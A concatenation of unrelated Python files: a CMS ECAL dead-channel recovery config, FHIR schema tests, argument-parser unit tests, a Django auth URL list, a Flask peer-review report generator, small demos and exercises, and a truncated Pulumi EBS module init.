import FWCore.ParameterSet.Config as cms
process = cms.Process("DCRec")
process.load("Configuration.StandardSequences.MagneticField_cff")
#process.load("Configuration.StandardSequences.Geometry_cff") # Depreciated
process.load("Configuration.Geometry.GeometryIdeal_cff")
process.load("Configuration.EventContent.EventContent_cff")
process.load("Geometry.CaloEventSetup.CaloGeometry_cfi")
process.load("Geometry.CaloEventSetup.CaloTopology_cfi")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
#process.GlobalTag.globaltag = cms.string('START53_V10::All')
process.GlobalTag.globaltag = 'GR_P_V42_AN2::All' # this one for run2012D
process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
#process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(100) )
process.options = cms.untracked.PSet( wantSummary = cms.untracked.bool(True) )
# *****************************************************************
# Input Source
# *****************************************************************
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
# '/store/relval/CMSSW_2_2_4/RelValTTbar/GEN-SIM-RECO/STARTUP_V8_v1/0000/200EB7E3-90F3-DD11-B1B0-001D09F2432B.root',
# '/eos/cms/store/relval/CMSSW_5_3_4_cand1/RelValZEE/GEN-SIM-RECO/PU_START53_V10-v1/0003/22521942-41F7-E111-A383-003048D375AA.root',
# '/store/relval/CMSSW_5_3_4_cand1/RelValZEE/GEN-SIM-RECO/PU_START53_V10-v1/0003/22521942-41F7-E111-A383-003048D375AA.root',
# 'file:/afs/cern.ch/work/v/vgiakoum/public/8200EF9B-0AA0-E111-9E58-003048FFCB6A.root'
# 'file:/afs/cern.ch/work/i/ikesisog/public/TestFiles/8200EF9B-0AA0-E111-9E58-003048FFCB6A.root'
'/store/data/Run2012D/DoublePhotonHighPt/AOD/PromptReco-v1/000/203/994/30ABB9D1-790E-E211-AFF1-001D09F242EF.root',
# '/store/data/Run2012D/DoublePhotonHighPt/AOD/PromptReco-v1/000/203/994/3E8BBC89-620E-E211-9185-001D09F25479.root',
# '/store/data/Run2012D/DoublePhotonHighPt/AOD/PromptReco-v1/000/203/994/DC93F9B0-6B0E-E211-8F48-003048D37560.root',
# '/store/data/Run2012D/DoublePhotonHighPt/AOD/PromptReco-v1/000/203/994/FA29ECAC-640E-E211-A95F-001D09F28D54.root',
# 'root://eoscms//eos/cms/store/relval/CMSSW_5_3_4_cand1/RelValZEE/GEN-SIM-RECO/PU_START53_V10-v1/0003/22521942-41F7-E111-A383-003048D375AA.root',
# 'rfio:/afs/cern.ch/user/i/ikesisog/public/22521942-41F7-E111-A383-003048D375AA.root',
)
)
# *****************************************************************
# Output Target
# *****************************************************************
process.out = cms.OutputModule("PoolOutputModule",
fileName = cms.untracked.string('Results_vic.root'),
outputCommands = cms.untracked.vstring('keep EcalRecHitsSorted_*_*_*'),
#SelectEvents = cms.untracked.PSet( SelectEvents = cms.vstring("p") ),
)
# *****************************************************************
# RecHitsKiller and RecHitRecoveryProducer module for Barrel
# *****************************************************************
process.CreateEBDeadCells = cms.EDProducer("EBChannelKiller",
hitTag = cms.InputTag("reducedEcalRecHitsEB", ""),
reducedHitCollection = cms.string("CreateEB"),
KilledHitCollection = cms.string("KilledEcalRecHitsEB"),
DeadChannelsFile = cms.string("EBDeadCellsEach5.txt"),
KillDeadCells = cms.bool(True),
)
process.ModCorrectEBDeadCells = cms.EDProducer("EBDeadChannelRecoveryProducers",
hitTag = cms.InputTag("CreateEBDeadCells", "CreateEB"),
reducedHitCollection = cms.string("ModifyEB"),
DeadChannelsFile = cms.string("EBDeadCellsEach5.txt"),
Sum8GeVThreshold = cms.double(8.0),
CorrectionMethod = cms.string("NeuralNetworks"),
CorrectDeadCells = cms.bool(True),
)
# *****************************************************************
# RecHitsKiller and RecHitRecoveryProducer module for EndCap
# *****************************************************************
process.CreateEEDeadCells = cms.EDProducer("EEChannelKiller",
hitTag = cms.InputTag("reducedEcalRecHitsEE", ""),
reducedHitCollection = cms.string("CreateEE"),
KilledHitCollection = cms.string("KilledEcalRecHitsEE"),
DeadChannelsFile = cms.string("EEDeadCellsEach5.txt"),
KillDeadCells = cms.bool(True),
)
process.ModCorrectEEDeadCells = cms.EDProducer("EEDeadChannelRecoveryProducers",
hitTag = cms.InputTag("CreateEEDeadCells", "CreateEE"),
reducedHitCollection = cms.string("ModifyEE"),
DeadChannelsFile = cms.string("EEDeadCellsEach5.txt"),
Sum8GeVThreshold = cms.double(8.0),
CorrectionMethod = cms.string("NeuralNetworks"),
CorrectDeadCells = cms.bool(True),
)
process.TFileService = cms.Service("TFileService", fileName = cms.string('recovery_hist.root'))
process.validateRecoveryEB = cms.EDAnalyzer("EcalDeadChannelRecoveryAnalyzer",
originalRecHitCollection = cms.InputTag("reducedEcalRecHitsEB", ""),
recoveredRecHitCollection = cms.InputTag("ModCorrectEBDeadCells", "ModifyEB"),
titlePrefix = cms.string("(EB) "),
)
process.validateRecoveryEE = cms.EDAnalyzer("EcalDeadChannelRecoveryAnalyzer",
originalRecHitCollection = cms.InputTag("reducedEcalRecHitsEE", ""),
recoveredRecHitCollection = cms.InputTag("ModCorrectEEDeadCells", "ModifyEE"),
titlePrefix = cms.string("(EE) "),
)
process.dump = cms.EDAnalyzer("EcalRecHitDump",
EBRecHitCollection = cms.InputTag("ModCorrectEBDeadCells", "ModifyEB"),
EERecHitCollection = cms.InputTag("ModCorrectEEDeadCells", "ModifyEE"),
)
# *****************************************************************
# Execution Path
# *****************************************************************
process.p = cms.Path(process.CreateEBDeadCells * process.ModCorrectEBDeadCells * process.validateRecoveryEB +
process.CreateEEDeadCells * process.ModCorrectEEDeadCells * process.validateRecoveryEE )
process.outpath = cms.EndPath(process.out)
|
import json
from typing import cast, List
from fhir.resources.claim import Claim
from fhir.resources.claim import ClaimItem
from fhir.resources.address import Address
from fhir.resources.organization import Organization
from schema.insight_engine_response import InsightEngineResponse, Insight, InsightType, Trace
def test_Address():
myAddr = Address()
myAddr.city = 'City'
assert myAddr.city == "City"
def test_claim1():
with open("schema/claim1.json") as claim1file:
claim1json = json.load(claim1file)
claim1 = Claim(**claim1json)
assert claim1.id == "claim1234"
assert claim1.type.id == "something"
items = cast(List[ClaimItem], claim1.item)
item = items[0]
coding = item.productOrService.coding[0]
assert coding.code == "0028U"
def test_json_str():
json_dict = {"resourceType": "Organization",
"id": "mmanu",
"active": True,
"name": "Acme Corporation",
"address": [{"country": "Swizterland"}]
}
org = Organization(**json_dict)
assert isinstance(org.address[0], Address)
assert org.address[0].country == "Swizterland"
js = org.json()
assert json.loads(js)['active'] is True
def test_response():
json_dict = {
"id": "10",
"insights": [
{
"id": "1"
}
]
}
response = InsightEngineResponse(**json_dict)
assert len(response.insights) == 1
def test_file_deserialization():
response = InsightEngineResponse.parse_file('schema/InsightEngineResponse.json')
insight: Insight = response.insights[0]
assert insight.description == "No"
assert insight.type == InsightType.NotApplicable
def get_trace() -> Trace:
trace = Trace()
trace.tree_name = 'Fictitious tree'
trace.end_label = '1200N'
trace.traversal = [
('Is CUE professional?', 'YES'),
('Is the CLUE procedureCode an E/M code?', 'NO'),
('Is modifier 78 present in any modifier field in the CLUE?', 'NO'),
('Are there OC for same patient as the CLUE?', 'YES'),
('Are there OCL (same or different claim) with an anesthesia procedureCode?', 'YES'),
('Are there OCL on the same day as the CLUE?', 'NO')
]
return trace
def get_insight() -> Insight:
trace = get_trace()
return Insight(
id='TEST-CLAIM',
type=InsightType.ClaimLineValid,
description='No other claims on the same day with anesthesia code.',
trace=[trace],
policy_name='Fictitious policy',
claim_line_sequence_num=1
)
def get_response() -> InsightEngineResponse:
insight = get_insight()
return InsightEngineResponse(
insights=[insight],
engine_name='fictitious-engine'
)
def test_trace():
trace = get_trace()
# Simulate writing and reading the trace to/from a file...
obj = json.loads(trace.json())
t = Trace.parse_obj(obj)
assert t.tree_name == 'Fictitious tree'
assert t.end_label == '1200N'
assert t.traversal[2][0] == 'Is modifier 78 present in any modifier field in the CLUE?'
assert t.traversal[2][1] == 'NO'
assert len(t.traversal) == 6
def test_insight_trace_and_policy_name():
insight = get_insight()
# Simulate writing and reading the insight to/from a file...
obj = json.loads(insight.json())
i = Insight.parse_obj(obj)
assert i.policy_name == 'Fictitious policy'
assert i.type == InsightType.ClaimLineValid
assert i.description == 'No other claims on the same day with anesthesia code.'
assert i.claim_line_sequence_num == 1
assert len(i.trace) == 1
assert i.trace[0].traversal[4][0] == 'Are there OCL (same or different claim) with an anesthesia procedureCode?'
assert i.trace[0].traversal[4][1] == 'YES'
def test_response_engine_name():
response = get_response()
# Simulate writing and reading the response to/from a file...
obj = json.loads(response.json())
r = InsightEngineResponse.parse_obj(obj)
assert r.engine_name == 'fictitious-engine'
assert len(r.insights) == 1
assert r.insights[0].policy_name == 'Fictitious policy'
assert r.insights[0].type == InsightType.ClaimLineValid
assert r.insights[0].description == 'No other claims on the same day with anesthesia code.'
assert r.insights[0].claim_line_sequence_num == 1
assert len(r.insights[0].trace) == 1
assert r.insights[0].trace[0].traversal[3][0] == 'Are there OC for same patient as the CLUE?'
assert r.insights[0].trace[0].traversal[3][1] == 'YES'
def test_old_response():
res = InsightEngineResponse.parse_file('tests/sample-response.json')
assert len(res.insights) == 1
assert res.insights[0].policy_name is None
assert res.insights[0].trace is None
assert res.engine_name is None
assert res.insights[0].defense.script.messages[0].message == "Some message."
|
#!/usr/bin/python
# Classification (U)
"""Program: argparser_arg_parse2.py
Description: Integration testing of arg_parse2 in
gen_class.ArgParser class.
Usage:
test/integration/gen_class/argparser_arg_parse2.py
Arguments:
"""
# Libraries and Global Variables
# Standard
import sys
import os
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
# Third-party
# Local
sys.path.append(os.getcwd())
import gen_class
import gen_libs
import version
__version__ = version.__version__
class UnitTest(unittest.TestCase):
"""Class: UnitTest
Description: Class which is a representation of a unit testing.
Methods:
setUp
test_opt_val_bin_override2
test_opt_val_bin_override
test_multi_val_override2
test_multi_val_override
test_opt_def_override2
test_opt_def_override
test_opt_val_override2
test_opt_val_override
test_all_together
test_multiple_opt_def
test_multilist_multiple_val
test_multi_val_one_val
test_multi_val_no_val
test_multi_val_def_arg
test_multi_val_two_args
test_multi_val_one_arg
test_opt_val_arg_int
test_opt_val_bin
test_opt_def_no_val2
test_opt_def_no_val
test_opt_val_two_arg
test_opt_val_one_arg
test_arg_value_not_set
test_prog_with_arg
test_with_two_args
test_with_one_arg
test_argv_no_args
test_empty_argv_list2
test_empty_argv_list
"""
def setUp(self):
"""Function: setUp
Description: Initialization for unit testing.
Arguments:
"""
p_name = "program.py"
p_path = "/path"
self.argv = [p_name]
self.argv2 = [p_name, "-M"]
self.argv3 = [p_name, "-M", "-a"]
self.argv4 = [p_name, "-M", "merge"]
self.argv5 = [p_name, "-c", "cfg", "-d", p_path]
self.argv6 = [p_name, "-c", "cfg", "-d"]
self.argv7 = [p_name, "-c", "-1"]
self.argv8 = [p_name, "-f", "file1", "file2"]
self.argv9 = [p_name, "-f", "file1", "file2", "-g", "file3", "file4"]
self.argv10 = [p_name, "-f"]
self.argv11 = [p_name, "-f", "file5"]
self.argv12 = [p_name, "-f", "file1", "file2", "file3"]
self.argv13 = [p_name, "-f", "-g"]
self.argv14 = [
p_name, "-c", "cfg", "-d", p_path, "-M", "-f", "file1", "file2"]
self.opt_val = ["-c", "-d", "-f", "-g"]
self.opt_val2 = ["-M", "-a"]
self.opt_def = {"-g": ["def_val"], "-f": ["file1", "file2"]}
self.opt_def2 = {"-f": ["file1"]}
self.multi_val = ["-f", "-g"]
self.multi_val2 = ["-g"]
self.opt_val_bin = ["-d"]
self.opt_val_bin2 = ["-M", "-a"]
self.results = {"-M": True}
self.results2 = {"-M": True, "-a": True}
self.results3 = {"-M": "merge"}
self.results4 = {"-c": "cfg", "-d": p_path}
self.results5 = {"-c": "cfg"}
self.results6 = {"-c": "cfg", "-d": None}
self.results7 = {"-c": "-1"}
self.results8 = {"-f": ["file1", "file2"]}
self.results9 = {"-f": ["file1", "file2"], "-g": ["file3", "file4"]}
self.results10 = {"-f": ["file1"]}
self.results11 = {"-f": ["file5"]}
self.results12 = {"-f": ["file1", "file2", "file3"]}
self.results13 = {"-g": ["def_val"], "-f": ["file1", "file2"]}
self.results14 = {"-c": "cfg", "-d": p_path, "-M": True,
"-f": ["file1", "file2"]}
self.results15 = {"-f": "file5"}
self.results16 = {"-M": None, "-a": None}
def test_opt_val_bin_override2(self):
"""Function: test_opt_val_bin_override2
Description: Test with opt_val_bin passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv3, opt_val_bin=self.opt_val_bin)
self.assertTrue(args_array.arg_parse2(opt_val_bin=self.opt_val_bin2))
def test_opt_val_bin_override(self):
"""Function: test_opt_val_bin_override
Description: Test with opt_val_bin passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv3, opt_val_bin=self.opt_val_bin)
args_array.arg_parse2(opt_val_bin=self.opt_val_bin2)
self.assertEqual(args_array.args_array, self.results16)
def test_multi_val_override2(self):
"""Function: test_multi_val_override2
Description: Test with multi_val passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv11, opt_val=self.opt_val, multi_val=self.multi_val)
self.assertTrue(args_array.arg_parse2(multi_val=self.multi_val2))
def test_multi_val_override(self):
"""Function: test_multi_val_override
Description: Test with multi_val passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv11, opt_val=self.opt_val, multi_val=self.multi_val)
args_array.arg_parse2(multi_val=self.multi_val2)
self.assertEqual(args_array.args_array, self.results15)
def test_opt_def_override2(self):
"""Function: test_opt_def_override2
Description: Test with opt_def passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv10, opt_val=self.opt_val, multi_val=self.multi_val,
opt_def=self.opt_def2)
self.assertTrue(args_array.arg_parse2(opt_def=self.opt_def))
def test_opt_def_override(self):
"""Function: test_opt_def_override
Description: Test with opt_def passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv10, opt_val=self.opt_val, multi_val=self.multi_val,
opt_def=self.opt_def2)
args_array.arg_parse2(opt_def=self.opt_def)
self.assertEqual(args_array.args_array, self.results8)
def test_opt_val_override2(self):
"""Function: test_opt_val_override2
Description: Test with opt_val passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv2, opt_val=self.opt_val2)
self.assertTrue(args_array.arg_parse2(opt_val=self.opt_val))
def test_opt_val_override(self):
"""Function: test_opt_val_override
Description: Test with opt_val passed in to override.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv2, opt_val=self.opt_val2)
args_array.arg_parse2(opt_val=self.opt_val)
self.assertEqual(args_array.args_array, self.results)
def test_all_together(self):
"""Function: test_all_together
Description: Test with all options together.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv14, opt_val=self.opt_val, multi_val=self.multi_val,
opt_def=self.opt_def, do_parse=True)
self.assertEqual(args_array.args_array, self.results14)
def test_multiple_opt_def(self):
"""Function: test_multiple_opt_def
Description: Test with multiple default values with multi_val.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv13, opt_val=self.opt_val, multi_val=self.multi_val,
opt_def=self.opt_def, do_parse=True)
self.assertEqual(args_array.args_array, self.results13)
def test_multilist_multiple_val(self):
"""Function: test_multilist_multiple_val
Description: Test with multi_list set to multiple values.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv12, opt_val=self.opt_val, multi_val=self.multi_val,
do_parse=True)
self.assertEqual(args_array.args_array, self.results12)
def test_multi_val_one_val(self):
"""Function: test_multi_val_one_val
Description: Test with multi_list set to one value.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv11, opt_val=self.opt_val, multi_val=self.multi_val,
do_parse=True)
self.assertEqual(args_array.args_array, self.results11)
def test_multi_val_no_val(self):
"""Function: test_multi_val_no_val
Description: Test with multi_list and setting one of them using
default values.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv10, opt_val=self.opt_val, multi_val=self.multi_val)
with gen_libs.no_std_out():
self.assertFalse(args_array.arg_parse2())
def test_multi_val_def_arg(self):
"""Function: test_multi_val_def_arg
Description: Test with multi_list and setting one of them using
default values.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv10, opt_val=self.opt_val, multi_val=self.multi_val,
opt_def=self.opt_def2, do_parse=True)
self.assertEqual(args_array.args_array, self.results10)
def test_multi_val_two_args(self):
"""Function: test_multi_val_two_args
Description: Test with multi_val set to two arguments with multiple
values.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv9, opt_val=self.opt_val, multi_val=self.multi_val,
do_parse=True)
self.assertEqual(args_array.args_array, self.results9)
def test_multi_val_one_arg(self):
"""Function: test_multi_val_one_arg
Description: Test with multi_val set to one argument.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv8, opt_val=self.opt_val, multi_val=self.multi_val,
do_parse=True)
self.assertEqual(args_array.args_array, self.results8)
def test_opt_val_arg_int(self):
"""Function: test_opt_val_arg_int
Description: Test with opt_val_set set to integer value.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv7, opt_val=self.opt_val, do_parse=True)
self.assertEqual(args_array.args_array, self.results7)
def test_opt_val_bin(self):
"""Function: test_opt_val_bin
Description: Test with opt_val_bin set with no value passed in for the
argument.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv6, opt_val=self.opt_val, opt_val_bin=self.opt_val_bin,
do_parse=True)
self.assertEqual(args_array.args_array, self.results6)
def test_opt_def_no_val2(self):
"""Function: test_opt_def_no_val2
Description: Test with opt_def but no value.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv6, opt_val=self.opt_val)
with gen_libs.no_std_out():
self.assertFalse(args_array.arg_parse2())
def test_opt_def_no_val(self):
"""Function: test_opt_def_no_val
Description: Test with opt_def but no value.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv6, opt_val=self.opt_val)
with gen_libs.no_std_out():
args_array.arg_parse2()
self.assertEqual(args_array.args_array, self.results5)
def test_opt_val_two_arg(self):
"""Function: test_opt_val_two_arg
Description: Test with opt_val set to two arguments.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv5, opt_val=self.opt_val, do_parse=True)
self.assertEqual(args_array.args_array, self.results4)
def test_opt_val_one_arg(self):
"""Function: test_opt_val_one_arg
Description: Test with opt_val set to one argument.
Arguments:
"""
args_array = gen_class.ArgParser(
self.argv4, opt_val=self.opt_val2, do_parse=True)
self.assertEqual(args_array.args_array, self.results3)
def test_arg_value_not_set(self):
"""Function: test_arg_value_not_set
Description: Test with argument with value, but not set in opt_val.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv4, do_parse=True)
self.assertEqual(args_array.args_array, self.results)
def test_prog_with_arg(self):
"""Function: test_prog_with_arg
Description: Test with program name with argument.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv2, do_parse=True)
self.assertEqual(args_array.args_array, self.results)
def test_with_two_args(self):
"""Function: test_with_two_args
Description: Test with two arguments, no values.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv3, do_parse=True)
self.assertEqual(args_array.args_array, self.results2)
def test_with_one_arg(self):
"""Function: test_with_one_arg
Description: Test with one argument, no values.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv2, do_parse=True)
self.assertEqual(args_array.args_array, self.results)
def test_argv_no_args(self):
"""Function: test_argv_no_args
Description: Test with argv with no arguments.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv, do_parse=True)
self.assertEqual(args_array.args_array, {})
def test_empty_argv_list2(self):
"""Function: test_empty_argv_list2
Description: Test with argv as empty list.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv)
args_array.argv = []
self.assertTrue(args_array.arg_parse2())
def test_empty_argv_list(self):
"""Function: test_empty_argv_list
Description: Test with argv as empty list.
Arguments:
"""
args_array = gen_class.ArgParser(self.argv)
args_array.argv = []
args_array.arg_parse2()
self.assertEqual(args_array.args_array, {})
if __name__ == "__main__":
unittest.main()
|
from queue import Queue
"""Script to find the first non-repeating string in a stream.
This module reads a file called stream.txt to create a stream of strings. As a string is received, return the first
non-repeating string in the stream.
Example:
$ python nonrepeating.py
Todo:
* Add input argument for file to parse as stream
* Create separate main so this is separate module
"""
def non_repeating(value, counts, q):
"""Finds the first non-repeating string in a stream.
Args:
value (str): Latest string received in the string
counts (dict): Dictionary of strings containing the counts to determine if string is repeated
q (Queue): Container for all strings in stream that have yet determined as being repeated
Return:
str: First non-repeating string. None if all strings are repeated.
"""
q.put(value)
if value in counts:
counts[value] += 1
else:
counts[value] = 1
while not q.empty():
if counts[q.queue[0]] > 1:
q.get()
else:
return q.queue[0]
if q.empty():
return None
def process_stream():
"""Processes the input file as a stream.
"""
counts = {}
q = Queue()
with open('stream.txt') as stream:
[print(non_repeating(value.strip(), counts, q)) for value in stream.readlines()]
def main():
"""Driver method.
"""
process_stream()
if __name__ == '__main__':
main()
|
from django.urls import path
from . import views
urlpatterns = [
path(route='login' , view=views.LoginView.as_view() , name='login_page') ,
path(route='logout' , view=views.LogoutView.as_view() , name='logout_page') ,
path(route='register' , view=views.RegisterView.as_view() , name='register_page') ,
path(route='forget-password' , view=views.ForgetPasswordView.as_view() , name='forget_password_page') ,
path(route='reset-password/<active_code>' , view=views.ResetPasswordView.as_view() , name='reset_password_page') ,
path(route='activate-account/<str:email_active_code>' , view=views.ActivateAccountView.as_view() , name='activate_account_page')
]
|
from flask import request, make_response, render_template
from flask.views import MethodView
from flask_cas import login_required
from common_functions import display_access_control_error
from catCas import validate_professor
import gbmodel
class MissingStudentException(Exception):
"""
We raise this exception if we find no students for a given team or session, to be more explicit than eg.
a KeyError.
"""
pass
class MissingTeamException(Exception):
"""
We raise this exception if we don't find a team in the database when we look it up by id
"""
pass
class GeneratedProfessorReportView(MethodView):
@login_required
def get(self):
"""
Generates a report for a specific student, for viewing by a professor.
Specifically, generates a single report, for a single session and term (midterm or final), for a
single student, with comments deanonymized.
"""
if not validate_professor():
return display_access_control_error()
student_id = request.args.get('student_id')
session_id = request.args.get('session_id')
is_final = request.args.get('is_final')
# TODO find a less fragile way to deal with booleans in urls
if is_final == "False":
is_final = False
else:
is_final = True
try:
pdf = _make_student_report_pdf(student_id, session_id, is_final, is_professor_report=True)
response = make_response(pdf)
except MissingStudentException:
response = make_response(render_template('404.html'), 404)
return response
class GeneratedAnonymousReportView(MethodView):
@login_required
def get(self):
"""
Generates all anonymized reports for printing and handing out to students.
"""
if not validate_professor():
return display_access_control_error()
session_id = request.args.get('session_id')
is_final = request.args.get('is_final')
# TODO find a less fragile way to deal with booleans in urls
if is_final == "False":
is_final = False
else:
is_final = True
try:
pdf = _make_printable_reports(session_id, is_final)
response = make_response(pdf)
except MissingStudentException:
response = make_response(render_template('404.html'), 404)
return response
def _make_printable_reports(session_id, is_final):
"""
Compiles all reports for a session into one for printing.
This means we generate a bunch of anonymized reports, then concatenate them, since page breaks are
handled in the HTML template.
Keyword arguments:
session_id -- session to generate reports for
is_final -- if True, makes a final report. If False, generates a midterm report.
"""
students = gbmodel.students().get_students_in_session(session_id)
if students is None or len(students) <= 0:
raise MissingStudentException("No students for this session.")
report = ""
# Concatenate anonymized reports for all students on the team
for s in students:
report = report + _make_student_report_pdf(s.id, session_id, is_final)
return report
def _make_student_report_pdf(student_id, session_id, is_final, is_professor_report=False):
"""
Renders a report for a student, defaulting to the results of their midterm review.
Unless is_professor_report is set to True, the report will be anonymized.
Keyword arguments:
student_id -- id of the student to generate a report for
session_id -- session to generate reports for
is_final -- if True, makes a final report. If False, generates a midterm report.
is_professor_report -- if True, makes a deanonymized report. If False, generates an anonymous report.
"""
# Get all the info we need to compile the report
reports = gbmodel.reports().get_reports_for_student(student_id, session_id, is_final)
student = gbmodel.students().get_student_in_session(student_id, session_id)
if student is None:
raise MissingStudentException("Trying to generate a report for a student that doesn't exist.")
name = student.name
team_id = student.tid
team = gbmodel.teams().get_team_from_id(team_id)
if team is None:
raise MissingTeamException("The student's team does not appear to exist.")
team_name = team.name
# init scores so we can tally how many 1s we got, 2s, etc.
scores = {
'tech_mastery': [],
'work_ethic': [],
'communication': [],
'cooperation': [],
'initiative': [],
'team_focus': [],
'contribution': [],
'leadership': [],
'organization': [],
'delegation': []
}
for _, value in scores.items():
for i in range(6):
value.append(0)
# Do any calculations we need to fill in the table.
# Compile all strengths and weaknesses into a list, tally up scores, etc.
strengths = []
weaknesses = []
traits_to_work_on = []
# These two fields are only on self reviews.
what_you_learned = None
proud_of_accomplishment = None
# Iterate through all reports, tallying scores.
# As we go we also collect a list of all the text box answers.
points = 0
for r in reports:
for key, value in scores.items():
this_score = getattr(r, key)
# 6 = N/A in the table
if this_score is None:
this_score = 6
# Increment the # of votes for this score. Ratings start at 1 and not 0 so we have to shift
# things left by one in the table.
scores[key][this_score-1] = scores[key][this_score-1] + 1
# If this is for the professor, all the comments should have names attached.
if is_professor_report:
reporter = gbmodel.students().get_student_in_session(r.reviewer, session_id)
if reporter is None:
raise MissingStudentException("The reporting student in a review doesn't exist.")
weaknesses.append("{}: {}".format(reporter.name, r.weaknesses))
strengths.append("{}: {}".format(reporter.name, r.strengths))
traits_to_work_on.append("{}: {}".format(reporter.name, r.traits_to_work_on))
# There are a handful of fields we only display if it's a professor and a self review.
if r.reviewer == student_id:
# what you learned always
what_you_learned = r.what_you_learned
# proud_of_accomplishment only applies for finals
proud_of_accomplishment = r.proud_of_accomplishment
# If this is the student's self review, the comments get marked with asterisks.
elif r.reviewer == student_id:
weaknesses.append("**{}".format(r.weaknesses))
strengths.append("**{}".format(r.strengths))
traits_to_work_on.append("**{}".format(r.traits_to_work_on))
else:
weaknesses.append(r.weaknesses)
strengths.append(r.strengths)
traits_to_work_on.append(r.traits_to_work_on)
# Tally up points
points += r.points
# Mark all the self reported scores
for r in reports:
if r.reviewer == student_id:
for key, value in scores.items():
this_score = getattr(r, key)
if this_score is not None:
scores[key][this_score-1] = "**{}".format(scores[key][this_score-1])
# Render the HTML version of the template
html = render_template('report.html',
name=name,
team=team_name,
scores=scores,
points=points,
strengths=strengths,
weaknesses=weaknesses,
traits_to_work_on=traits_to_work_on,
what_you_learned=what_you_learned,
proud_of_accomplishment=proud_of_accomplishment)
return html
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import pygame
import pygame.freetype
import pygame.gfxdraw
import pygame.locals
from glitchygames.engine import GameEngine
from glitchygames.sprites import BitmappySprite
from glitchygames.scenes import Scene
LOG = logging.getLogger('game')
LOG.setLevel(logging.DEBUG)
# Turn on sprite debugging
BitmappySprite.DEBUG = True
class GameScene(Scene):
log = LOG
def __init__(self, groups=pygame.sprite.LayeredDirty()):
super().__init__(groups=groups)
self.all_sprites = groups
self.screen = pygame.display.get_surface()
self.screen_width = self.screen.get_width()
self.screen_height = self.screen.get_height()
self.screen.fill((255, 255, 0))
self.all_sprites.clear(self.screen, self.background)
class Game(Scene):
# Set your game name/version here.
NAME = "Cached Font Demo"
VERSION = "1.0"
def __init__(self, options):
super().__init__(options=options)
# GameEngine.OPTIONS is set on initialization.
self.log.info(f'Game Options: {options}')
self.next_scene = GameScene()
@classmethod
def args(cls, parser):
parser.add_argument('-v', '--version',
action='store_true',
help='print the game version and exit')
def main():
GameEngine(game=Game).start()
if __name__ == '__main__':
main()
|
# Copyright 2021 Toyota Research Institute. All rights reserved.
import numpy as np
from camviz.objects.object import Object
class BBox2D(Object):
"""
Bounding Box 2D draw class
Parameters
----------
points : np.array
List of points for the bounding box dimension (left, top, right, bottom)
pose : np.array
Bounding box pose on the screen (right, down)
"""
def __init__(self, points, pose=None):
super().__init__(pose=pose)
self.pts = np.array([[points[0], points[1]],
[points[2], points[1]],
[points[2], points[3]],
[points[0], points[3]]])
def draw(self, draw, color_line='gre', color_edge=None):
"""
Draw 2D bounding box on screen
Parameters
----------
draw : camviz.Draw
Draw instance
color_line : str
Line color
color_edge : str
Edge color
"""
# Set color line if provided
if color_line is not None:
draw.color(color_line).width(2).lines(
self.pts[[0, 1, 1, 2, 2, 3, 3, 0]])
# Set color edge if provided
if color_edge is not None:
draw.color(color_edge).size(4).points(self.pts)
|
# --------------
# Code starts here
class_1=['Geoffrey Hinton','Andrew Ng','Sebastian Raschka','Yoshua Bengio']
class_2=['Hilary Mason','Carla Gentry','Corinna Cortes']
new_class=class_1+class_2
print(new_class)
new_class.append('Peter Warden')
print(new_class)
new_class.remove('Carla Gentry')
print(new_class)
# Code ends here
# --------------
# Code starts here
courses={'Math':65,'English':70,'History':80,'French':70,'Science':60}
print(courses)
a=courses['Math']
b=courses['English']
c=courses['History']
d=courses['French']
e=courses['Science']
total=a+b+c+d+e
print(total)
a=(total/5)
percentage=a
print(percentage)
# Code ends here
# --------------
# Code starts here
mathematics={'Geoffrey Hinton':78,'Andrew Ng':95, 'Sebastain Raschka':65,'Yoshua Benjio':50,
'Hilary Mason':70,'Corinna Cortes':66,'Peter Warden':75}
topper = max(mathematics,key = mathematics.get)
print (topper)
# Code ends here
# --------------
# Given string
topper = 'andrew ng'
# Code starts here
a=topper.split()
print(a)
first_name=a[0]
print(first_name)
last_name=a[1]
print(last_name)
full_name=last_name+ " "+ first_name
print(full_name)
certificate_name=full_name.upper()
a=certificate_name
print(a)
# Code ends here
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
# Export this package's modules as members:
from .default_kms_key import *
from .encryption_by_default import *
from .get_default_kms_key import *
from .get_ebs_volumes import *
from .get_encryption_by_default import *
from .get_snapshot import *
from .get_snapshot_ids import *
from .get_volume import *
from .snapshot import *
from .snapshot_copy import *
from .volume import *
from ._inputs import *
from . import outputs
def _register_module():
import pulumi
from .. import _utilities
class Module(pulumi.runtime.ResourceModule):
_version = _utilities.get_semver_version()
